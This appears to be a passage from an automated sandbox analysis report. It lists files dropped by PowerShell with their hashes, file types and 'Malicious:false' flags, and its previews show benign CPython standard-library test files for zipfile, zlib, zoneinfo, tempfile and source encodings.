                                                                                                                                                                                                                      Preview:import array..import contextlib..import importlib.util..import io..import itertools..import os..import pathlib..import posixpath..import struct..import subprocess..import sys..import time..import unittest..import unittest.mock as mock..import zipfile......from tempfile import TemporaryFile..from random import randint, random, randbytes....from test import archiver_tests..from test.support import script_helper..from test.support import (.. findfile, requires_zlib, requires_bz2, requires_lzma,.. captured_stdout, captured_stderr, requires_subprocess..)..from test.support.os_helper import (.. TESTFN, unlink, rmtree, temp_dir, temp_cwd, fd_count..)......TESTFN2 = TESTFN + "2"..TESTFNDIR = TESTFN + "d"..FIXEDTEST_SIZE = 1000..DATAFILES_DIR = 'zipfile_datafiles'....SMALL_TEST_DATA = [('_ziptest1', '1q2w3e4r5t'),.. ('ziptest2dir/_ziptest2', 'qawsedrftg'),.. ('ziptest2dir/ziptest3dir/_ziptest3', 'azsxdcfvgb'),.. ('ziptest2dir/ziptes
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34623
                                                                                                                                                                                                                      Entropy (8bit):4.810798147234586
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:k2WXrBhKiffOrfSZrflwzDq+5+7rk8LNGpcw:kJciffOCLYX
                                                                                                                                                                                                                      MD5:E631E993CFCC64FE46399DEDC2BBDCFB
                                                                                                                                                                                                                      SHA1:8DEBE64E75FC487535AE9EBE4B061D762D9B6970
                                                                                                                                                                                                                      SHA-256:005C5DAFEF91F50AD931EA83DD12E70905FB951DED986A994063C0342CEE3038
                                                                                                                                                                                                                      SHA-512:45633A55134045C0945212C648BA36F123C481F9BDFC46D15FE7804995F2DB69FE9D7A296FE46B4A2CEBCA0E5670D8523A27974B9C4F9971960D9D644B4C7E51
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import sys..import os..import marshal..import importlib..import importlib.util..import struct..import time..import unittest..import unittest.mock..import warnings....from test import support..from test.support import import_helper..from test.support import os_helper....from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED....import zipimport..import linecache..import doctest..import inspect..import io..from traceback import extract_tb, extract_stack, print_tb..try:.. import zlib..except ImportError:.. zlib = None....test_src = """\..def get_name():.. return __name__..def get_file():.. return __file__.."""..test_co = compile(test_src, "<???>", "exec")..raise_src = 'def do_raise(): raise TypeError\n'....def make_pyc(co, mtime, size):.. data = marshal.dumps(co).. pyc = (importlib.util.MAGIC_NUMBER +.. struct.pack("<iLL", 0,.. int(mtime) & 0xFFFF_FFFF, size & 0xFFFF_FFFF) + data).. return pyc....def module_path_to_dotted_name(path):..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11065
                                                                                                                                                                                                                      Entropy (8bit):4.237253370127232
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:NvBqLBVG1UwlByoef97p5/Kg3tATnWhq3UW0cIOKyeey:NvB8VsBtQzSY
                                                                                                                                                                                                                      MD5:547FA2C4C503B09B334195FF0A7D2369
                                                                                                                                                                                                                      SHA1:2818CB2363B51E9B1F5E4A0098E96E2ACB456E34
                                                                                                                                                                                                                      SHA-256:8E825628898DC3A7AD454C4AF6FE7B1D13F229CEBF582AA698FA6C5F80CB1E8C
                                                                                                                                                                                                                      SHA-512:D2514CB8E9AFAAA5E9A7C89B7AE9B8CA9B9CD40E2BB0397FE2261ABDDF067F9781AF59FC94EE544B7E3682D064BA375FCBD91CBF200B39D0097E01481EF127B4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# This test module covers support in various parts of the standard library..# for working with modules located inside zipfiles..# The tests are centralised in this fashion to make it easy to drop them..# if a platform doesn't support zipimport..import test.support..import os..import os.path..import sys..import textwrap..import zipfile..import zipimport..import doctest..import inspect..import linecache..import unittest..from test.support import os_helper..from test.support.script_helper import (spawn_python, kill_python, assert_python_ok,.. make_script, make_zip_script)....verbose = test.support.verbose....# Library modules covered by this test set..# pdb (Issue 4201)..# inspect (Issue 4223)..# doctest (Issue 4197)....# Other test modules with zipimport related tests..# test_zipimport (of course!)..# test_cmd_line_script (covers the zipimport support in runpy)....# Retrieve some helpers from other test cases..from test.test_doctest import (tes
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):43583
                                                                                                                                                                                                                      Entropy (8bit):4.799290336699909
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:eFlkM4gof8fl04dYH9tjHSt8yZI9zMVVBz:kHofmlldYH9t5YVHz
                                                                                                                                                                                                                      MD5:5D3D522091E6A02DA2135A9486B45575
                                                                                                                                                                                                                      SHA1:A8CEDAAB1C5AB2736D48CA946756132FAB8F9E79
                                                                                                                                                                                                                      SHA-256:D92C75C7534BDCCA4B29A1FD2A937B35FAD869FF46C647CC6C00F6E9BE403EAE
                                                                                                                                                                                                                      SHA-512:1CF94A26805C8AA4DEFB18A961118E3E77C2723F0916088A035F85DDB567A9EC1903F4228B47E5158628DE86C9DD4D637A60DD9F0FC63FDA34D303A258B9F709
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest..from test import support..from test.support import import_helper..import binascii..import copy..import os..import pickle..import random..import sys..from test.support import bigmemtest, _1G, _4G, skip_on_s390x......zlib = import_helper.import_module('zlib')....requires_Compress_copy = unittest.skipUnless(.. hasattr(zlib.compressobj(), "copy"),.. 'requires Compress.copy()')..requires_Decompress_copy = unittest.skipUnless(.. hasattr(zlib.decompressobj(), "copy"),.. 'requires Decompress.copy()')......def _zlib_runtime_version_tuple(zlib_version=zlib.ZLIB_RUNTIME_VERSION):.. # Register "1.2.3" as "1.2.3.0".. # or "1.2.0-linux","1.2.0.f","1.2.0.f-linux".. v = zlib_version.split('-', 1)[0].split('.').. if len(v) < 4:.. v.append('0').. elif not v[-1].isnumeric():.. v[-1] = '0'.. return tuple(map(int, v))......ZLIB_RUNTIME_VERSION_TUPLE = _zlib_runtime_version_tuple()......# bpo-46623: On s390x, when a hardware accele
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):69
                                                                                                                                                                                                                      Entropy (8bit):3.969902899493558
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:1LRzRz0MLDKYBibaIFLRzRz0MLDK+/R1xiv:1LRzRAKPBTIFLRzRAKFM
                                                                                                                                                                                                                      MD5:0932A2F3C2C67D95FA39C0CBD8FEBD97
                                                                                                                                                                                                                      SHA1:974D2603C8AF77847BE945F1388E79EBD399E3A3
                                                                                                                                                                                                                      SHA-256:02A23F3B32E870FDAC0E561B7F9D1A1330DD7D9D0173C34A0A161A41D423A6A3
                                                                                                                                                                                                                      SHA-512:946D3C4C7228855ED1D061428C7B17E70C7C635603B68F2A685A84A6BA975B76ECAC2FCA8B9470F5590D2517D58B83A2B3C06A107E72A6CB8B3010214ECA8B4C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from .test_zoneinfo import *..from .test_zoneinfo_property import *..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):56
                                                                                                                                                                                                                      Entropy (8bit):3.965438283935978
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:JShh9QLM3z6RNCmMmo0MLDK6n:CQLMSC0KX
                                                                                                                                                                                                                      MD5:23B8DD1E1E2313F1E500AF1F74EC5FE3
                                                                                                                                                                                                                      SHA1:5C80BDD38D160163D2A684A66FE5E0FCEF9F0F61
                                                                                                                                                                                                                      SHA-256:B6943037914CE89195847B23F031C20AAEB1CF9BE5DF1C8C83F1F1448C146472
                                                                                                                                                                                                                      SHA-512:95F78222A154A7E2E714788D055B260CE35445D54FDCA0D621461DE887FED889E40384112C897171083CD6D6B13C588A4D19FE0D9472B1F340ECE8AE6CDDFDD8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest....unittest.main('test.test_zoneinfo')..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3300
                                                                                                                                                                                                                      Entropy (8bit):4.591367001263984
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:UKzbr57wFK3qIvVpWK5gKPm0qjbgMUaoxsX5:UK7TqwVPm0IbgMdoxsX5
                                                                                                                                                                                                                      MD5:268581CEF14658F6B02E9DD09719E1D9
                                                                                                                                                                                                                      SHA1:D9BBA7CE46A27E92581BADA949F628B8A95706A9
                                                                                                                                                                                                                      SHA-256:295F1037679095A721EC3F15BF4F01C3C2041798B0FD41A3391F8B6E76E56D0F
                                                                                                                                                                                                                      SHA-512:955311640117D994D0B676F4DD5C235B0C3A42E0F3FC9F7947F00CE3D11CB2A6894BD9053878D40138DF0F28A1592272F0EDD2720EDD87AB2394D7EBF202D7C6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import contextlib..import functools..import sys..import threading..import unittest..from test.support.import_helper import import_fresh_module....OS_ENV_LOCK = threading.Lock()..TZPATH_LOCK = threading.Lock()..TZPATH_TEST_LOCK = threading.Lock()......def call_once(f):.. """Decorator that ensures a function is only ever called once.""".. lock = threading.Lock().. cached = functools.lru_cache(None)(f).... @functools.wraps(f).. def inner():.. with lock:.. return cached().... return inner......@call_once..def get_modules():.. """Retrieve two copies of zoneinfo: pure Python and C accelerated..... Because this function manipulates the import system in a way that might.. be fragile or do unexpected things if it is run many times, it uses a.. `call_once` decorator to ensure that this is only ever called exactly.. one time . in other words, when using this function you will only ever.. get one copy of each module rather than a fresh import
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3288
                                                                                                                                                                                                                      Entropy (8bit):4.877443557458495
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:tc04VHH3vYKop0dKOhPD62vm6guPlZ0H0gYsTw:tcRfoHOhPDZrdzgVTw
                                                                                                                                                                                                                      MD5:EAE20040CF397E3A961C5A0169CAFEE8
                                                                                                                                                                                                                      SHA1:B3CF51AEA8C9447DCA10CAAD1314AF8BF7621869
                                                                                                                                                                                                                      SHA-256:F8EC807F599342F8FB5FD3F3131AAE2B8FB855F6A30938620ED0506676EF363D
                                                                                                                                                                                                                      SHA-512:F1740A77C6FE6893BF008CD34919EA281DE989D8A1320C5942DE628C900A8D73D50069B9341BC429284343F294AE60D79070A8838E124C89E436450EC75C2F6B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..Script to automatically generate a JSON file containing time zone information.....This is done to allow "pinning" a small subset of the tzdata in the tests,..since we are testing properties of a file that may be subject to change. For..example, the behavior in the far future of any given zone is likely to change,..but "does this give the right answer for this file in 2040" is still an..important property to test.....This must be run from a computer with zoneinfo data installed..."""..from __future__ import annotations....import base64..import functools..import json..import lzma..import pathlib..import textwrap..import typing....import zoneinfo....KEYS = [.. "Africa/Abidjan",.. "Africa/Casablanca",.. "America/Los_Angeles",.. "America/Santiago",.. "Asia/Tokyo",.. "Australia/Sydney",.. "Europe/Dublin",.. "Europe/Lisbon",.. "Europe/London",.. "Pacific/Kiritimati",.. "UTC",..]....TEST_DATA_LOC = pathlib.Path(__file__).parent......@functools.lru_cache(ma
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13084
                                                                                                                                                                                                                      Entropy (8bit):6.342623602260241
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:QhfRaogOBmI7wtHBe5OLqqeoCqtM73QNCYCnXCkcRh41NIVM2njXAWxj3Fe/ESlP:ER2I0tHBVe5KM7QmXCIwVpLxjGEQzZhP
                                                                                                                                                                                                                      MD5:CE5E9CE0B4DDBC11C3509AA2BD78860C
                                                                                                                                                                                                                      SHA1:D89BEC99491C43745EA3EE09072840AA07EE0A00
                                                                                                                                                                                                                      SHA-256:024A384A1B875063C07AAACFE2DFF63F0E163987193177BAB709966C2357035A
                                                                                                                                                                                                                      SHA-512:41CEAF9527742649F55A9C3EBC755CD20C03EF8FB78886002A99DCE39E8D07D8069C984D2732573DBECD7B36D9DFB16A6F8EF4F4BCA9F4FCD3FF088A33D43969
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:{.. "data": {.. "Africa/Abidjan": [.. "{Wp48S^xk9=GL@E0stWa761SMbT8$j-~f{VGF<>F7KxBg5R*{Ksocg8-YYVul=v7vZzaHN",.. "uC=da5UI2rH18c!OnjV{y4u(+A!!VBKmY&$ORw>7UO^(500B;v0RR91bXh%WvBYQl0ssI2",.. "00dcD".. ],.. "Africa/Casablanca": [.. "{Wp48S^xk9=GL@E0stWa761SMbT8$j;0b&Kz+C_;7KxBg5R*{N&yjMUR~;C-fDaSOU;q-~",.. "FqW+4{YBjbcw}`a!dW>b)R2-0a+uwf`P3{_Y@HuCz}S$J$ZJ>R_V<~|Fk>sgX4=%0vUrh-",.. "lt@YP^Wrus;j?`Th#xRPzf<<~Hp4DH^gZX>d{+WOp~HNu8!{uWu}&XphAd{j1;rB4|9?R!",.. "pqruAFUMt8#*WcrVS{;kLlY(cJRV$w?d2car%R<ALOSO?^`4;ZZtI)%f^^G^>s>q9BgTU4",.. "Ht-tQKZ7Z`9QqOb?R#b%z?rk>!CkH7jy3wja4NG2q)H}fNRKg8v{);Em;K3Cncf4C6&Oaj",.. "V+DbX%o4+)CV3+e!Lm6dutu(0BQpH1T?W(~cQtKV*^_Pdx!LirjpTs?Bmt@vktjLq4;)O!",.. "rrly=c*rwTwMJFd0I57`hgkc?=nyI4RZf9W$6DCWugmf&)wk^tWH17owj=#PGH7Xv-?9$j",.. "njwDlkOE+BFNR9YXEmBpO;rqEw=e2IR-8^(W;8ma?M3JVd($2T>IW+0tk|Gm8>ftukRQ9J",.. "8k3brzqMnVyjsLI-CKneFa)Lxvp_a<CkQEd#(pMA^rr}rBNElGA=*!M)puBdoErR9{kWL@",.. "w=svMc6eZ^
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):82649
                                                                                                                                                                                                                      Entropy (8bit):4.672848893212964
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:OJoc/u+m4ReCGkUCqCIUk7mvLp2c2M4K8lB:Oq4u+jReCdUCvkBM4K8X
                                                                                                                                                                                                                      MD5:0227F4AB864FD93695B24A48B3E41C3F
                                                                                                                                                                                                                      SHA1:A3B0B0CD8B35A07900B04BE031B0888321790D93
                                                                                                                                                                                                                      SHA-256:327D0E17A6B5E7649DB592044A74628355385A1F1F8C8476F7832471A39A338A
                                                                                                                                                                                                                      SHA-512:550B186F8C0CF94CB9DBCDC02D74513A544008118096F7DBED332665854FC2EB33272F8DD7DD94957D41D9352F14D67B255BCD1030AC11AE9F3CFBDB8FEB11D1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from __future__ import annotations....import base64..import contextlib..import dataclasses..import importlib.metadata..import io..import json..import os..import pathlib..import pickle..import re..import shutil..import struct..import tempfile..import unittest..from datetime import date, datetime, time, timedelta, timezone..from functools import cached_property....from test.support import MISSING_C_DOCSTRINGS..from test.test_zoneinfo import _support as test_support..from test.test_zoneinfo._support import OS_ENV_LOCK, TZPATH_TEST_LOCK, ZoneInfoTestBase..from test.support.import_helper import import_module, CleanImport....lzma = import_module('lzma')..py_zoneinfo, c_zoneinfo = test_support.get_modules()....try:.. importlib.metadata.metadata("tzdata").. HAS_TZDATA_PKG = True..except importlib.metadata.PackageNotFoundError:.. HAS_TZDATA_PKG = False....ZONEINFO_DATA = None..ZONEINFO_DATA_V1 = None..TEMP_DIR = None..DATA_DIR = pathlib.Path(__file__).parent / "data"..ZONEINFO_JSON = D
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12395
                                                                                                                                                                                                                      Entropy (8bit):4.860439979066916
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:AG80L9KHi7kPWl36oLEtqlqLkVJlT6bTSHVrrTS9RTRuuavwDHl:FXAi7k2KoRqLkfccu/l
                                                                                                                                                                                                                      MD5:16C4E377D7E33DB0DAE4538EEE93DA66
                                                                                                                                                                                                                      SHA1:D03A3B0C9747DDFBE7D47D530CCD9A7C4BE8C385
                                                                                                                                                                                                                      SHA-256:A28C0B314D0230D29946AA924DD7299A686E147D1EB5EFC83AB83767962D7C53
                                                                                                                                                                                                                      SHA-512:1AD4A09058BFCD0CF51D758D1952DEDC0684B1A7E290595E20DCB748EA625E86BDA480A2D48FF0D453BD2C85013D5FBE967DDD56E3911485071E4E1C1C88AA7B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import contextlib..import datetime..import os..import pickle..import unittest..import zoneinfo....from test.support.hypothesis_helper import hypothesis....import test.test_zoneinfo._support as test_support....ZoneInfoTestBase = test_support.ZoneInfoTestBase....py_zoneinfo, c_zoneinfo = test_support.get_modules()....UTC = datetime.timezone.utc..MIN_UTC = datetime.datetime.min.replace(tzinfo=UTC)..MAX_UTC = datetime.datetime.max.replace(tzinfo=UTC)..ZERO = datetime.timedelta(0)......def _valid_keys():.. """Get available time zones, including posix/ and right/ directories.""".. from importlib import resources.... available_zones = sorted(zoneinfo.available_timezones()).. TZPATH = zoneinfo.TZPATH.... def valid_key(key):.. for root in TZPATH:.. key_file = os.path.join(root, key).. if os.path.exists(key_file):.. return True.... components = key.split("/").. package_name = ".".join(["tzdata.zoneinfo"] + components[:-1]).
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):741
                                                                                                                                                                                                                      Entropy (8bit):4.363884794057295
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:f/ckQG9ngJdALMxRpHRTEKpJRbFVuSIDsss9LUGXe5vhL:X3ngv0MxrLJVjss9+51
                                                                                                                                                                                                                      MD5:E496C730296D9B57AF9648AD245D7F20
                                                                                                                                                                                                                      SHA1:39C99E7922972DBC46984DF320E3D99AED0DAFF2
                                                                                                                                                                                                                      SHA-256:CFF586174109F4901052BFFE80F102EFE1703A8E4AD9E082B8DA26A7F893CB79
                                                                                                                                                                                                                      SHA-512:ECE0DB011FAFADCA0F69629A6B6384349BE039EACBCB5C85E1A1C7B56555262F9678D8EF42E1AF29D851F122A72C040AD8708B1BFD5C0AA83515C005A16233C7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Helper script for test_tempfile.py. argv[2] is the number of a file..# descriptor which should _not_ be open. Check this by attempting to..# write to it -- if we succeed, something is wrong.....import sys..import os..from test.support import SuppressCrashReport....with SuppressCrashReport():.. verbose = (sys.argv[1] == 'v').. try:.. fd = int(sys.argv[2]).... try:.. os.write(fd, b"blat").. except OSError:.. # Success -- could not write to fd... sys.exit(0).. else:.. if verbose:.. sys.stderr.write("fd %d is open in child" % fd).. sys.exit(1).... except Exception:.. if verbose:.. raise.. sys.exit(1)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3031
                                                                                                                                                                                                                      Entropy (8bit):4.913347151056587
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:pgHz06l+vOFLZz1iLo+ndi2AZbpUjAuBQxOeJFzvLA7veLIhnNZuXhX5Gg:pRPvOFLZ0Bdi26bxJx7JhgCIhnNZuX9N
                                                                                                                                                                                                                      MD5:56437BF2F7B280079F81C1FF1638CE46
                                                                                                                                                                                                                      SHA1:B358663512988678F98BD8E819D0B2C38E9F4DE5
                                                                                                                                                                                                                      SHA-256:2F15150A98A5584EDFCD6E52A491FF3097C84D502A90B6C3021889E31B2D5EBF
                                                                                                                                                                                                                      SHA-512:5D70ADF0AC2B767D1F13A58CA6A5A1D0D85D7FF13C8EAD78E15273E2D4554692E16D1AAFCCA0B5794B0CE62B76821B7764E76D09749F0AF7B9B2592BCA00457B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# It's intended that this script be run by hand. It runs speed tests on..# hashlib functions; it does not test for correctness.....import sys..import time..import hashlib......def creatorFunc():.. raise RuntimeError("eek, creatorFunc not overridden")....def test_scaled_msg(scale, name):.. iterations = 106201//scale * 20.. longStr = b'Z'*scale.... localCF = creatorFunc.. start = time.perf_counter().. for f in range(iterations):.. x = localCF(longStr).digest().. end = time.perf_counter().... print(('%2.2f' % (end-start)), "seconds", iterations, "x", len(longStr), "bytes", name)....def test_create():.. start = time.perf_counter().. for f in range(20000):.. d = creatorFunc().. end = time.perf_counter().... print(('%2.2f' % (end-start)), "seconds", '[20000 creations]')....def test_zero():.. start = time.perf_counter().. for f in range(20000):.. x = creatorFunc().digest().. end = time.perf_counter().... print(('%2.2f' % (e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25
                                                                                                                                                                                                                      Entropy (8bit):3.7794705707972507
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SyIFGaMIQWFIt:SbFGaMtWFu
                                                                                                                                                                                                                      MD5:22CC72E6552E2BD4D5168010EA1E7B94
                                                                                                                                                                                                                      SHA1:1A18A98C86FAB7E3DCE5E408C0AC804B99B991E6
                                                                                                                                                                                                                      SHA-256:B80833EF32924A90EEE9D18453D2238ACED60B083F0E8CC084FD3B0C986D23A2
                                                                                                                                                                                                                      SHA-512:B233FAB56EDEF9DB78DCE7D5068057BDAC333CA1200EF220592F286F4BCFDB914D976848E3AB9E9AE287EB2D011B7C9788B56875D8954B397B491CE70EAD67FE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: uft-8 -*-..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                      Entropy (8bit):4.625
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:jQlqwWVMovn:slqCov
                                                                                                                                                                                                                      MD5:063F96B8555C5129E16DB14E15071448
                                                                                                                                                                                                                      SHA1:4637CD84139F505B3F63A2F0A2B9B8CC91EFBF74
                                                                                                                                                                                                                      SHA-256:6EE3A4A2518FFADE55228D27FEECD9BB891CE973FDA8DA510E4A7BD2EBC476CA
                                                                                                                                                                                                                      SHA-512:E27A19E4A6F93C03FD5C55004CBF615EADD86BAD5DADDBDF965C9212C91388B73778FF74B534BB127B4308109FCC54D5958E1A8401B3B6030977BF3CBAC6529C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.#coding: utf8..print('.')..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34
                                                                                                                                                                                                                      Entropy (8bit):4.113362385992581
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SyIFGaMIQlAyIUkXov:SbFGaMtlAyii
                                                                                                                                                                                                                      MD5:72E39EB3810F6BF7EA13DE4F9875EC57
                                                                                                                                                                                                                      SHA1:884CCA7C2F88639144B02546C83370F2664D0E02
                                                                                                                                                                                                                      SHA-256:53AD4D723BE19E3FE2A9E4D14E7D4D74A21DA1418864D9F464CB4FC29772A46F
                                                                                                                                                                                                                      SHA-512:3E86D859B8C9EC56EADFFDFA788826D356B0710A3D22014B6E22635B435E22FA0D0AE1E5B391F46EA05F91D8FC6C285BD7992BB8C4E863A168603856F5EDFEAB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-... = 2..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22
                                                                                                                                                                                                                      Entropy (8bit):3.5503407095463877
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:sBwn:Jn
                                                                                                                                                                                                                      MD5:8CEA5AFC2E5FC2C2ECF0872B40C7DCE3
                                                                                                                                                                                                                      SHA1:908E189B914DB686B5EEEAC65CFFB49E189E4124
                                                                                                                                                                                                                      SHA-256:798AAE7206B2A921C09F0754F215D0D809180F08413F87D77F82908EDA01968C
                                                                                                                                                                                                                      SHA-512:3D725A4FE2FA3C8978D17F9C437945C46698E0AD979F750C5D331C5AA8E4105371585F6A452A200897E12BCA7D664BA2C6DA4CE9F77A57755D18CD6F48C6604A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#coding:latin1........
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):456
                                                                                                                                                                                                                      Entropy (8bit):4.92632828823683
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:22DASu/khlHYTFi/WLaFyXd6whDh9QzSIypFWsdU:TmeSQ/41n9nIypJe
                                                                                                                                                                                                                      MD5:2D393339C41B997146938349AD906374
                                                                                                                                                                                                                      SHA1:FB819F7D4265D62569F6C755B5F83B542C92B5F6
                                                                                                                                                                                                                      SHA-256:DA6136F1F6D227E30B9D741B059AB7E44BF78E5A851C8A37BD7F9904E5063756
                                                                                                                                                                                                                      SHA-512:8E8AB7C6A3DFCF3ADD9D1CEE5C5EA1948FF905366237384440C91F171E9412C55F2D6E64EDCA4B611471DA0B9040000943C79EE2D078648D087C3A937173D23F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.# -*- coding: latin1 -*-..# IMPORTANT: this file has the utf-8 BOM signature '\xef\xbb\xbf'..# at the start of it. Make sure this is preserved if any changes..# are made! Also note that the coding cookie above conflicts with..# the presence of a utf-8 BOM signature -- this is intended.....# Arbitrary encoded utf-8 text (stolen from test_doctest2.py)...x = '.....'..def y():.. """.. And again in a comment. ....... """.. pass..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):313
                                                                                                                                                                                                                      Entropy (8bit):4.960476443302122
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:Ssf/kUkCAJHH4OrJOFi/WLaF+p85LGpFcjpOpgOEsjKK3FiNv:S+/khlHYTFi/WLaFhypFWsdU
                                                                                                                                                                                                                      MD5:72F0C10353850C92FD5460153F7C2688
                                                                                                                                                                                                                      SHA1:7F4B94EF324C1F686D257973F3D513C2B36F2BCF
                                                                                                                                                                                                                      SHA-256:B8CAA98AECFD4114BB31818D9AB55E2F067899BAE8C493D49D0C0A5507298455
